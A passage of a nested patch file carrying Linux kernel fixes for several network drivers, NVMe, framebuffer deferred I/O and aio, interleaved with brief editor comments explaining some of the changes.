++{
++	u32 ctrl_ext;
++	s32 i2cctl;
++
++	ctrl_ext = rd32(E1000_CTRL_EXT);
++	ctrl_ext |= E1000_CTRL_I2C_ENA;
++	wr32(E1000_CTRL_EXT, ctrl_ext);
++	wrfl();
++
++	i2cctl = rd32(E1000_I2CPARAMS);
++	i2cctl |= E1000_I2CBB_EN
++		| E1000_I2C_CLK_OE_N
++		| E1000_I2C_DATA_OE_N;
++	wr32(E1000_I2CPARAMS, i2cctl);
++	wrfl();
++}
++#endif
++
+ void igb_reset(struct igb_adapter *adapter)
+ {
+ 	struct pci_dev *pdev = adapter->pdev;
+@@ -2400,7 +2424,8 @@ void igb_reset(struct igb_adapter *adapter)
+ 			 * interface.
+ 			 */
+ 			if (adapter->ets)
+-				mac->ops.init_thermal_sensor_thresh(hw);
++				igb_set_i2c_bb(hw);
++			mac->ops.init_thermal_sensor_thresh(hw);
+ 		}
+ 	}
+ #endif
+@@ -3117,21 +3142,12 @@ static void igb_init_mas(struct igb_adapter *adapter)
+  **/
+ static s32 igb_init_i2c(struct igb_adapter *adapter)
+ {
+-	struct e1000_hw *hw = &adapter->hw;
+ 	s32 status = 0;
+-	s32 i2cctl;
+ 
+ 	/* I2C interface supported on i350 devices */
+ 	if (adapter->hw.mac.type != e1000_i350)
+ 		return 0;
+ 
+-	i2cctl = rd32(E1000_I2CPARAMS);
+-	i2cctl |= E1000_I2CBB_EN
+-		| E1000_I2C_CLK_OUT | E1000_I2C_CLK_OE_N
+-		| E1000_I2C_DATA_OUT | E1000_I2C_DATA_OE_N;
+-	wr32(E1000_I2CPARAMS, i2cctl);
+-	wrfl();
+-
+ 	/* Initialize the i2c bus which is controlled by the registers.
+ 	 * This bus will use the i2c_algo_bit structure that implements
+ 	 * the protocol through toggling of the 4 bits in the register.
+@@ -3521,6 +3537,12 @@ static int igb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			adapter->ets = true;
+ 		else
+ 			adapter->ets = false;
++		/* Only enable I2C bit banging if an external thermal
++		 * sensor is supported.
++		 */
++		if (adapter->ets)
++			igb_set_i2c_bb(hw);
++		hw->mac.ops.init_thermal_sensor_thresh(hw);
+ 		if (igb_sysfs_init(adapter))
+ 			dev_err(&pdev->dev,
+ 				"failed to allocate sysfs resources\n");
+@@ -6794,7 +6816,7 @@ static void igb_perout(struct igb_adapter *adapter, int tsintr_tt)
+ 	struct timespec64 ts;
+ 	u32 tsauxc;
+ 
+-	if (pin < 0 || pin >= IGB_N_PEROUT)
++	if (pin < 0 || pin >= IGB_N_SDP)
+ 		return;
+ 
+ 	spin_lock(&adapter->tmreg_lock);
+@@ -6802,7 +6824,7 @@ static void igb_perout(struct igb_adapter *adapter, int tsintr_tt)
+ 	if (hw->mac.type == e1000_82580 ||
+ 	    hw->mac.type == e1000_i354 ||
+ 	    hw->mac.type == e1000_i350) {
+-		s64 ns = timespec64_to_ns(&adapter->perout[pin].period);
++		s64 ns = timespec64_to_ns(&adapter->perout[tsintr_tt].period);
+ 		u32 systiml, systimh, level_mask, level, rem;
+ 		u64 systim, now;
+ 
+@@ -6850,8 +6872,8 @@ static void igb_perout(struct igb_adapter *adapter, int tsintr_tt)
+ 		ts.tv_nsec = (u32)systim;
+ 		ts.tv_sec  = ((u32)(systim >> 32)) & 0xFF;
+ 	} else {
+-		ts = timespec64_add(adapter->perout[pin].start,
+-				    adapter->perout[pin].period);
++		ts = timespec64_add(adapter->perout[tsintr_tt].start,
++				    adapter->perout[tsintr_tt].period);
+ 	}
+ 
+ 	/* u32 conversion of tv_sec is safe until y2106 */
+@@ -6860,7 +6882,7 @@ static void igb_perout(struct igb_adapter *adapter, int tsintr_tt)
+ 	tsauxc = rd32(E1000_TSAUXC);
+ 	tsauxc |= TSAUXC_EN_TT0;
+ 	wr32(E1000_TSAUXC, tsauxc);
+-	adapter->perout[pin].start = ts;
++	adapter->perout[tsintr_tt].start = ts;
+ 
+ 	spin_unlock(&adapter->tmreg_lock);
+ }
+@@ -6874,7 +6896,7 @@ static void igb_extts(struct igb_adapter *adapter, int tsintr_tt)
+ 	struct ptp_clock_event event;
+ 	struct timespec64 ts;
+ 
+-	if (pin < 0 || pin >= IGB_N_EXTTS)
++	if (pin < 0 || pin >= IGB_N_SDP)
+ 		return;
+ 
+ 	if (hw->mac.type == e1000_82580 ||
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe.h b/drivers/net/ethernet/intel/ixgbe/ixgbe.h
+index 5369a97ff5ec0..2bf387e52e202 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe.h
+@@ -67,6 +67,8 @@
+ #define IXGBE_RXBUFFER_4K    4096
+ #define IXGBE_MAX_RXBUFFER  16384  /* largest size for a single descriptor */
+ 
++#define IXGBE_PKT_HDR_PAD   (ETH_HLEN + ETH_FCS_LEN + (VLAN_HLEN * 2))
++
+ /* Attempt to maximize the headroom available for incoming frames.  We
+  * use a 2K buffer for receives and need 1536/1534 to store the data for
+  * the frame.  This leaves us with 512 bytes of room.  From that we need
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+index 298cfbfcb7b6f..faf3a094ac540 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_main.c
+@@ -6777,6 +6777,18 @@ static void ixgbe_free_all_rx_resources(struct ixgbe_adapter *adapter)
+ 			ixgbe_free_rx_resources(adapter->rx_ring[i]);
+ }
+ 
++/**
++ * ixgbe_max_xdp_frame_size - returns the maximum allowed frame size for XDP
++ * @adapter: device handle, pointer to adapter
++ */
++static int ixgbe_max_xdp_frame_size(struct ixgbe_adapter *adapter)
++{
++	if (PAGE_SIZE >= 8192 || adapter->flags2 & IXGBE_FLAG2_RX_LEGACY)
++		return IXGBE_RXBUFFER_2K;
++	else
++		return IXGBE_RXBUFFER_3K;
++}
++
+ /**
+  * ixgbe_change_mtu - Change the Maximum Transfer Unit
+  * @netdev: network interface device structure
+@@ -6788,18 +6800,12 @@ static int ixgbe_change_mtu(struct net_device *netdev, int new_mtu)
+ {
+ 	struct ixgbe_adapter *adapter = netdev_priv(netdev);
+ 
+-	if (adapter->xdp_prog) {
+-		int new_frame_size = new_mtu + ETH_HLEN + ETH_FCS_LEN +
+-				     VLAN_HLEN;
+-		int i;
+-
+-		for (i = 0; i < adapter->num_rx_queues; i++) {
+-			struct ixgbe_ring *ring = adapter->rx_ring[i];
++	if (ixgbe_enabled_xdp_adapter(adapter)) {
++		int new_frame_size = new_mtu + IXGBE_PKT_HDR_PAD;
+ 
+-			if (new_frame_size > ixgbe_rx_bufsz(ring)) {
+-				e_warn(probe, "Requested MTU size is not supported with XDP\n");
+-				return -EINVAL;
+-			}
++		if (new_frame_size > ixgbe_max_xdp_frame_size(adapter)) {
++			e_warn(probe, "Requested MTU size is not supported with XDP\n");
++			return -EINVAL;
+ 		}
+ 	}
+ 
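[Editor's note] For reference, the new padding constant works out as IXGBE_PKT_HDR_PAD = ETH_HLEN (14) + ETH_FCS_LEN (4) + 2 * VLAN_HLEN (2 * 4) = 26 bytes, so with the default 3K XDP buffer the largest accepted MTU is 3072 - 26 = 3046, and 2048 - 26 = 2022 in the legacy-rx or 8K-page case handled by ixgbe_max_xdp_frame_size().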
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.c b/drivers/net/ethernet/mediatek/mtk_ppe.c
+index 784ecb2dc9fbd..34ea8af48c3d0 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.c
+@@ -595,8 +595,7 @@ mtk_foe_entry_commit_subflow(struct mtk_ppe *ppe, struct mtk_flow_entry *entry,
+ 	u32 ib1_mask = mtk_get_ib1_pkt_type_mask(ppe->eth) | MTK_FOE_IB1_UDP;
+ 	int type;
+ 
+-	flow_info = kzalloc(offsetof(struct mtk_flow_entry, l2_data.end),
+-			    GFP_ATOMIC);
++	flow_info = kzalloc(sizeof(*flow_info), GFP_ATOMIC);
+ 	if (!flow_info)
+ 		return;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.h b/drivers/net/ethernet/mediatek/mtk_ppe.h
+index a09c32539bcc9..e66283b1bc79e 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.h
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.h
+@@ -277,7 +277,6 @@ struct mtk_flow_entry {
+ 		struct {
+ 			struct mtk_flow_entry *base_flow;
+ 			struct hlist_node list;
+-			struct {} end;
+ 		} l2_data;
+ 	};
+ 	struct rhash_head node;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-qcom-ethqos.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-qcom-ethqos.c
+index 835caa15d55ff..732774645c1a6 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-qcom-ethqos.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-qcom-ethqos.c
+@@ -560,6 +560,8 @@ static int qcom_ethqos_probe(struct platform_device *pdev)
+ 	plat_dat->has_gmac4 = 1;
+ 	plat_dat->pmt = 1;
+ 	plat_dat->tso_en = of_property_read_bool(np, "snps,tso");
++	if (of_device_is_compatible(np, "qcom,qcs404-ethqos"))
++		plat_dat->rx_clk_runs_in_lpi = 1;
+ 
+ 	ret = stmmac_dvr_probe(&pdev->dev, plat_dat, &stmmac_res);
+ 	if (ret)
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+index 413f660172199..e95d35f1e5a0c 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac5.c
+@@ -541,9 +541,9 @@ int dwmac5_flex_pps_config(void __iomem *ioaddr, int index,
+ 		return 0;
+ 	}
+ 
+-	val |= PPSCMDx(index, 0x2);
+ 	val |= TRGTMODSELx(index, 0x2);
+ 	val |= PPSEN0;
++	writel(val, ioaddr + MAC_PPS_CONTROL);
+ 
+ 	writel(cfg->start.tv_sec, ioaddr + MAC_PPSx_TARGET_TIME_SEC(index));
+ 
+@@ -568,6 +568,7 @@ int dwmac5_flex_pps_config(void __iomem *ioaddr, int index,
+ 	writel(period - 1, ioaddr + MAC_PPSx_WIDTH(index));
+ 
+ 	/* Finally, activate it */
++	val |= PPSCMDx(index, 0x2);
+ 	writel(val, ioaddr + MAC_PPS_CONTROL);
+ 	return 0;
+ }
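[Editor's sketch] The reordering above is the usual configure-then-latch sequence for command-style registers: commit the mode and enable bits, program the target time and width, and only then write the command field that starts the engine. Schematically, with the register names from the hunk:

val |= TRGTMODSELx(index, 0x2);
val |= PPSEN0;
writel(val, ioaddr + MAC_PPS_CONTROL);	/* 1: mode + enable first */

/* 2: program the target time and width registers as above */

val |= PPSCMDx(index, 0x2);
writel(val, ioaddr + MAC_PPS_CONTROL);	/* 3: issue the command last */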
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 4bba0444c764a..84e1740b12f1b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1077,7 +1077,8 @@ static void stmmac_mac_link_up(struct phylink_config *config,
+ 
+ 	stmmac_mac_set(priv, priv->ioaddr, true);
+ 	if (phy && priv->dma_cap.eee) {
+-		priv->eee_active = phy_init_eee(phy, 1) >= 0;
++		priv->eee_active =
++			phy_init_eee(phy, !priv->plat->rx_clk_runs_in_lpi) >= 0;
+ 		priv->eee_enabled = stmmac_eee_init(priv);
+ 		priv->tx_lpi_enabled = priv->eee_enabled;
+ 		stmmac_set_eee_pls(priv, priv->hw, true);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c
+index eb6d9cd8e93f8..0046a4ee6e641 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c
+@@ -559,7 +559,7 @@ stmmac_probe_config_dt(struct platform_device *pdev, u8 *mac)
+ 	dma_cfg->mixed_burst = of_property_read_bool(np, "snps,mixed-burst");
+ 
+ 	plat->force_thresh_dma_mode = of_property_read_bool(np, "snps,force_thresh_dma_mode");
+-	if (plat->force_thresh_dma_mode) {
++	if (plat->force_thresh_dma_mode && plat->force_sf_dma_mode) {
+ 		plat->force_sf_dma_mode = 0;
+ 		dev_warn(&pdev->dev,
+ 			 "force_sf_dma_mode is ignored if force_thresh_dma_mode is set.\n");
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 4ff1cfdb9730c..00911e9360525 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -500,7 +500,15 @@ static int am65_cpsw_nuss_common_stop(struct am65_cpsw_common *common)
+ 		k3_udma_glue_disable_tx_chn(common->tx_chns[i].tx_chn);
+ 	}
+ 
++	reinit_completion(&common->tdown_complete);
+ 	k3_udma_glue_tdown_rx_chn(common->rx_chns.rx_chn, true);
++
++	if (common->pdata.quirks & AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ) {
++		i = wait_for_completion_timeout(&common->tdown_complete, msecs_to_jiffies(1000));
++		if (!i)
++			dev_err(common->dev, "rx teardown timeout\n");
++	}
++
+ 	napi_disable(&common->napi_rx);
+ 
+ 	for (i = 0; i < AM65_CPSW_MAX_RX_FLOWS; i++)
+@@ -704,6 +712,8 @@ static int am65_cpsw_nuss_rx_packets(struct am65_cpsw_common *common,
+ 
+ 	if (cppi5_desc_is_tdcm(desc_dma)) {
+ 		dev_dbg(dev, "%s RX tdown flow: %u\n", __func__, flow_idx);
++		if (common->pdata.quirks & AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ)
++			complete(&common->tdown_complete);
+ 		return 0;
+ 	}
+ 
+@@ -2634,7 +2644,7 @@ static const struct am65_cpsw_pdata j721e_pdata = {
+ };
+ 
+ static const struct am65_cpsw_pdata am64x_cpswxg_pdata = {
+-	.quirks = 0,
++	.quirks = AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ,
+ 	.ale_dev_id = "am64-cpswxg",
+ 	.fdqring_mode = K3_RINGACC_RING_MODE_RING,
+ };
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.h b/drivers/net/ethernet/ti/am65-cpsw-nuss.h
+index 2c9850fdfcb6d..a9610e130cd8d 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.h
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.h
+@@ -86,6 +86,7 @@ struct am65_cpsw_rx_chn {
+ };
+ 
+ #define AM65_CPSW_QUIRK_I2027_NO_TX_CSUM BIT(0)
++#define AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ BIT(1)
+ 
+ struct am65_cpsw_pdata {
+ 	u32	quirks;
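[Editor's sketch] Taken together, the three am65-cpsw hunks implement a standard completion handshake, gated by the new quirk bit: the stop path re-arms the completion before requesting RX teardown and then waits a bounded time; the RX path signals it when the teardown-complete marker descriptor (TDCM) is observed. Condensed from the hunks above:

/* stop path */
reinit_completion(&common->tdown_complete);
k3_udma_glue_tdown_rx_chn(common->rx_chns.rx_chn, true);
if (common->pdata.quirks & AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ &&
    !wait_for_completion_timeout(&common->tdown_complete,
				 msecs_to_jiffies(1000)))
	dev_err(common->dev, "rx teardown timeout\n");

/* rx packet path, on seeing the teardown marker */
if (cppi5_desc_is_tdcm(desc_dma)) {
	if (common->pdata.quirks & AM64_CPSW_QUIRK_DMA_RX_TDOWN_IRQ)
		complete(&common->tdown_complete);
	return 0;
}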
+diff --git a/drivers/net/usb/kalmia.c b/drivers/net/usb/kalmia.c
+index 9f2b70ef39aa1..613fc6910f148 100644
+--- a/drivers/net/usb/kalmia.c
++++ b/drivers/net/usb/kalmia.c
+@@ -65,8 +65,8 @@ kalmia_send_init_packet(struct usbnet *dev, u8 *init_msg, u8 init_msg_len,
+ 		init_msg, init_msg_len, &act_len, KALMIA_USB_TIMEOUT);
+ 	if (status != 0) {
+ 		netdev_err(dev->net,
+-			"Error sending init packet. Status %i, length %i\n",
+-			status, act_len);
++			"Error sending init packet. Status %i\n",
++			status);
+ 		return status;
+ 	}
+ 	else if (act_len != init_msg_len) {
+@@ -83,8 +83,8 @@ kalmia_send_init_packet(struct usbnet *dev, u8 *init_msg, u8 init_msg_len,
+ 
+ 	if (status != 0)
+ 		netdev_err(dev->net,
+-			"Error receiving init result. Status %i, length %i\n",
+-			status, act_len);
++			"Error receiving init result. Status %i\n",
++			status);
+ 	else if (act_len != expected_len)
+ 		netdev_err(dev->net, "Unexpected init result length: %i\n",
+ 			act_len);
+diff --git a/drivers/net/vmxnet3/vmxnet3_drv.c b/drivers/net/vmxnet3/vmxnet3_drv.c
+index 56267c327f0b7..682987040ea82 100644
+--- a/drivers/net/vmxnet3/vmxnet3_drv.c
++++ b/drivers/net/vmxnet3/vmxnet3_drv.c
+@@ -1546,31 +1546,6 @@ vmxnet3_rq_rx_complete(struct vmxnet3_rx_queue *rq,
+ 				rxd->len = rbi->len;
+ 			}
+ 
+-#ifdef VMXNET3_RSS
+-			if (rcd->rssType != VMXNET3_RCD_RSS_TYPE_NONE &&
+-			    (adapter->netdev->features & NETIF_F_RXHASH)) {
+-				enum pkt_hash_types hash_type;
+-
+-				switch (rcd->rssType) {
+-				case VMXNET3_RCD_RSS_TYPE_IPV4:
+-				case VMXNET3_RCD_RSS_TYPE_IPV6:
+-					hash_type = PKT_HASH_TYPE_L3;
+-					break;
+-				case VMXNET3_RCD_RSS_TYPE_TCPIPV4:
+-				case VMXNET3_RCD_RSS_TYPE_TCPIPV6:
+-				case VMXNET3_RCD_RSS_TYPE_UDPIPV4:
+-				case VMXNET3_RCD_RSS_TYPE_UDPIPV6:
+-					hash_type = PKT_HASH_TYPE_L4;
+-					break;
+-				default:
+-					hash_type = PKT_HASH_TYPE_L3;
+-					break;
+-				}
+-				skb_set_hash(ctx->skb,
+-					     le32_to_cpu(rcd->rssHash),
+-					     hash_type);
+-			}
+-#endif
+ 			skb_record_rx_queue(ctx->skb, rq->qid);
+ 			skb_put(ctx->skb, rcd->len);
+ 
+@@ -1653,6 +1628,31 @@ vmxnet3_rq_rx_complete(struct vmxnet3_rx_queue *rq,
+ 			u32 mtu = adapter->netdev->mtu;
+ 			skb->len += skb->data_len;
+ 
++#ifdef VMXNET3_RSS
++			if (rcd->rssType != VMXNET3_RCD_RSS_TYPE_NONE &&
++			    (adapter->netdev->features & NETIF_F_RXHASH)) {
++				enum pkt_hash_types hash_type;
++
++				switch (rcd->rssType) {
++				case VMXNET3_RCD_RSS_TYPE_IPV4:
++				case VMXNET3_RCD_RSS_TYPE_IPV6:
++					hash_type = PKT_HASH_TYPE_L3;
++					break;
++				case VMXNET3_RCD_RSS_TYPE_TCPIPV4:
++				case VMXNET3_RCD_RSS_TYPE_TCPIPV6:
++				case VMXNET3_RCD_RSS_TYPE_UDPIPV4:
++				case VMXNET3_RCD_RSS_TYPE_UDPIPV6:
++					hash_type = PKT_HASH_TYPE_L4;
++					break;
++				default:
++					hash_type = PKT_HASH_TYPE_L3;
++					break;
++				}
++				skb_set_hash(skb,
++					     le32_to_cpu(rcd->rssHash),
++					     hash_type);
++			}
++#endif
+ 			vmxnet3_rx_csum(adapter, skb,
+ 					(union Vmxnet3_GenericDesc *)rcd);
+ 			skb->protocol = eth_type_trans(skb, adapter->netdev);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 25ade4ce8e0a7..5acc9ae225df3 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4881,7 +4881,9 @@ int nvme_alloc_admin_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ out_cleanup_admin_q:
+ 	blk_mq_destroy_queue(ctrl->admin_q);
+ out_free_tagset:
+-	blk_mq_free_tag_set(ctrl->admin_tagset);
++	blk_mq_free_tag_set(set);
++	ctrl->admin_q = NULL;
++	ctrl->fabrics_q = NULL;
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(nvme_alloc_admin_tag_set);
+@@ -4931,6 +4933,7 @@ int nvme_alloc_io_tag_set(struct nvme_ctrl *ctrl, struct blk_mq_tag_set *set,
+ 
+ out_free_tag_set:
+ 	blk_mq_free_tag_set(set);
++	ctrl->connect_q = NULL;
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(nvme_alloc_io_tag_set);
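[Editor's sketch] Both error paths above follow a rule worth making explicit: after freeing a resource, also clear any longer-lived pointer that referenced it, so later teardown or retry logic sees NULL rather than a dangling pointer. The shape, as in the admin path:

out_free_tagset:
	blk_mq_free_tag_set(set);
	ctrl->admin_q = NULL;	/* destroyed above; do not leave dangling */
	ctrl->fabrics_q = NULL;
	return ret;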
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index d839689af17ce..778f94e9a4453 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -109,6 +109,7 @@ struct nvme_queue;
+ 
+ static void nvme_dev_disable(struct nvme_dev *dev, bool shutdown);
+ static bool __nvme_disable_io_queues(struct nvme_dev *dev, u8 opcode);
++static void nvme_update_attrs(struct nvme_dev *dev);
+ 
+ /*
+  * Represents an NVM Express device.  Each nvme_dev is a PCI function.
+@@ -1967,6 +1968,8 @@ static void nvme_map_cmb(struct nvme_dev *dev)
+ 	if ((dev->cmbsz & (NVME_CMBSZ_WDS | NVME_CMBSZ_RDS)) ==
+ 			(NVME_CMBSZ_WDS | NVME_CMBSZ_RDS))
+ 		pci_p2pmem_publish(pdev, true);
++
++	nvme_update_attrs(dev);
+ }
+ 
+ static int nvme_set_host_mem(struct nvme_dev *dev, u32 bits)
+@@ -2250,6 +2253,11 @@ static const struct attribute_group *nvme_pci_dev_attr_groups[] = {
+ 	NULL,
+ };
+ 
++static void nvme_update_attrs(struct nvme_dev *dev)
++{
++	sysfs_update_group(&dev->ctrl.device->kobj, &nvme_pci_dev_attrs_group);
++}
++
+ /*
+  * nirqs is the number of interrupts available for write and read
+  * queues. The core already reserved an interrupt for the admin queue.
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index 6f918e61b6aef..80383213b8828 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -1154,13 +1154,13 @@ static void nvme_rdma_error_recovery_work(struct work_struct *work)
+ 	struct nvme_rdma_ctrl *ctrl = container_of(work,
+ 			struct nvme_rdma_ctrl, err_work);
+ 
+-	nvme_auth_stop(&ctrl->ctrl);
+ 	nvme_stop_keep_alive(&ctrl->ctrl);
+ 	flush_work(&ctrl->ctrl.async_event_work);
+ 	nvme_rdma_teardown_io_queues(ctrl, false);
+ 	nvme_start_queues(&ctrl->ctrl);
+ 	nvme_rdma_teardown_admin_queue(ctrl, false);
+ 	nvme_start_admin_queue(&ctrl->ctrl);
++	nvme_auth_stop(&ctrl->ctrl);
+ 
+ 	if (!nvme_change_ctrl_state(&ctrl->ctrl, NVME_CTRL_CONNECTING)) {
+ 		/* state change failure is ok if we started ctrl delete */
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 4c052c261517e..1dc7c733c7e39 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -2128,7 +2128,6 @@ static void nvme_tcp_error_recovery_work(struct work_struct *work)
+ 				struct nvme_tcp_ctrl, err_work);
+ 	struct nvme_ctrl *ctrl = &tcp_ctrl->ctrl;
+ 
+-	nvme_auth_stop(ctrl);
+ 	nvme_stop_keep_alive(ctrl);
+ 	flush_work(&ctrl->async_event_work);
+ 	nvme_tcp_teardown_io_queues(ctrl, false);
+@@ -2136,6 +2135,7 @@ static void nvme_tcp_error_recovery_work(struct work_struct *work)
+ 	nvme_start_queues(ctrl);
+ 	nvme_tcp_teardown_admin_queue(ctrl, false);
+ 	nvme_start_admin_queue(ctrl);
++	nvme_auth_stop(ctrl);
+ 
+ 	if (!nvme_change_ctrl_state(ctrl, NVME_CTRL_CONNECTING)) {
+ 		/* state change failure is ok if we started ctrl delete */
+diff --git a/drivers/nvme/target/fc.c b/drivers/nvme/target/fc.c
+index ab2627e17bb97..1ab6601fdd5cf 100644
+--- a/drivers/nvme/target/fc.c
++++ b/drivers/nvme/target/fc.c
+@@ -1685,8 +1685,10 @@ nvmet_fc_ls_create_association(struct nvmet_fc_tgtport *tgtport,
+ 		else {
+ 			queue = nvmet_fc_alloc_target_queue(iod->assoc, 0,
+ 					be16_to_cpu(rqst->assoc_cmd.sqsize));
+-			if (!queue)
++			if (!queue) {
+ 				ret = VERR_QUEUE_ALLOC_FAIL;
++				nvmet_fc_tgt_a_put(iod->assoc);
++			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/of/of_reserved_mem.c b/drivers/of/of_reserved_mem.c
+index 65f3b02a0e4ed..f90975e004469 100644
+--- a/drivers/of/of_reserved_mem.c
++++ b/drivers/of/of_reserved_mem.c
+@@ -48,9 +48,10 @@ static int __init early_init_dt_alloc_reserved_memory_arch(phys_addr_t size,
+ 		err = memblock_mark_nomap(base, size);
+ 		if (err)
+ 			memblock_phys_free(base, size);
+-		kmemleak_ignore_phys(base);
+ 	}
+ 
++	kmemleak_ignore_phys(base);
++
+ 	return err;
+ }
+ 
+diff --git a/drivers/platform/x86/touchscreen_dmi.c b/drivers/platform/x86/touchscreen_dmi.c
+index f00995390fdfe..13802a3c3591d 100644
+--- a/drivers/platform/x86/touchscreen_dmi.c
++++ b/drivers/platform/x86/touchscreen_dmi.c
+@@ -1097,6 +1097,15 @@ const struct dmi_system_id touchscreen_dmi_table[] = {
+ 			DMI_MATCH(DMI_BIOS_DATE, "05/07/2016"),
+ 		},
+ 	},
++	{
++		/* Chuwi Vi8 (CWI501) */
++		.driver_data = (void *)&chuwi_vi8_data,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "i86"),
++			DMI_MATCH(DMI_BIOS_VERSION, "CHUWI.W86JLBNR01"),
++		},
++	},
+ 	{
+ 		/* Chuwi Vi8 (CWI506) */
+ 		.driver_data = (void *)&chuwi_vi8_data,
+diff --git a/drivers/vdpa/ifcvf/ifcvf_main.c b/drivers/vdpa/ifcvf/ifcvf_main.c
+index f9c0044c6442e..44b29289aa193 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_main.c
++++ b/drivers/vdpa/ifcvf/ifcvf_main.c
+@@ -849,7 +849,7 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	ret = ifcvf_init_hw(vf, pdev);
+ 	if (ret) {
+ 		IFCVF_ERR(pdev, "Failed to init IFCVF hw\n");
+-		return ret;
++		goto err;
+ 	}
+ 
+ 	for (i = 0; i < vf->nr_vring; i++)
+diff --git a/drivers/video/fbdev/core/fb_defio.c b/drivers/video/fbdev/core/fb_defio.c
+index c730253ab85ce..583cbcf094467 100644
+--- a/drivers/video/fbdev/core/fb_defio.c
++++ b/drivers/video/fbdev/core/fb_defio.c
+@@ -313,7 +313,7 @@ void fb_deferred_io_open(struct fb_info *info,
+ }
+ EXPORT_SYMBOL_GPL(fb_deferred_io_open);
+ 
+-void fb_deferred_io_cleanup(struct fb_info *info)
++void fb_deferred_io_release(struct fb_info *info)
+ {
+ 	struct fb_deferred_io *fbdefio = info->fbdefio;
+ 	struct page *page;
+@@ -327,6 +327,14 @@ void fb_deferred_io_cleanup(struct fb_info *info)
+ 		page = fb_deferred_io_page(info, i);
+ 		page->mapping = NULL;
+ 	}
++}
++EXPORT_SYMBOL_GPL(fb_deferred_io_release);
++
++void fb_deferred_io_cleanup(struct fb_info *info)
++{
++	struct fb_deferred_io *fbdefio = info->fbdefio;
++
++	fb_deferred_io_release(info);
+ 
+ 	kvfree(info->pagerefs);
+ 	mutex_destroy(&fbdefio->lock);
+diff --git a/drivers/video/fbdev/core/fbmem.c b/drivers/video/fbdev/core/fbmem.c
+index 1e70d8c676533..14ef3aab76630 100644
+--- a/drivers/video/fbdev/core/fbmem.c
++++ b/drivers/video/fbdev/core/fbmem.c
+@@ -1453,6 +1453,10 @@ __releases(&info->lock)
+ 	struct fb_info * const info = file->private_data;
+ 
+ 	lock_fb_info(info);
++#if IS_ENABLED(CONFIG_FB_DEFERRED_IO)
++	if (info->fbdefio)
++		fb_deferred_io_release(info);
++#endif
+ 	if (info->fbops->fb_release)
+ 		info->fbops->fb_release(info,1);
+ 	module_put(info->fbops->owner);
+diff --git a/fs/aio.c b/fs/aio.c
+index 562916d85cba8..e85ba0b77f596 100644
+--- a/fs/aio.c
++++ b/fs/aio.c
+@@ -361,6 +361,9 @@ static int aio_ring_mremap(struct vm_area_struct *vma)
+ 	spin_lock(&mm->ioctx_lock);
+ 	rcu_read_lock();
+ 	table = rcu_dereference(mm->ioctx_table);
++	if (!table)
++		goto out_unlock;
++
+ 	for (i = 0; i < table->nr; i++) {
+ 		struct kioctx *ctx;
+ 
+@@ -374,6 +377,7 @@ static int aio_ring_mremap(struct vm_area_struct *vma)
+ 		}
+ 	}
+ 
++out_unlock:
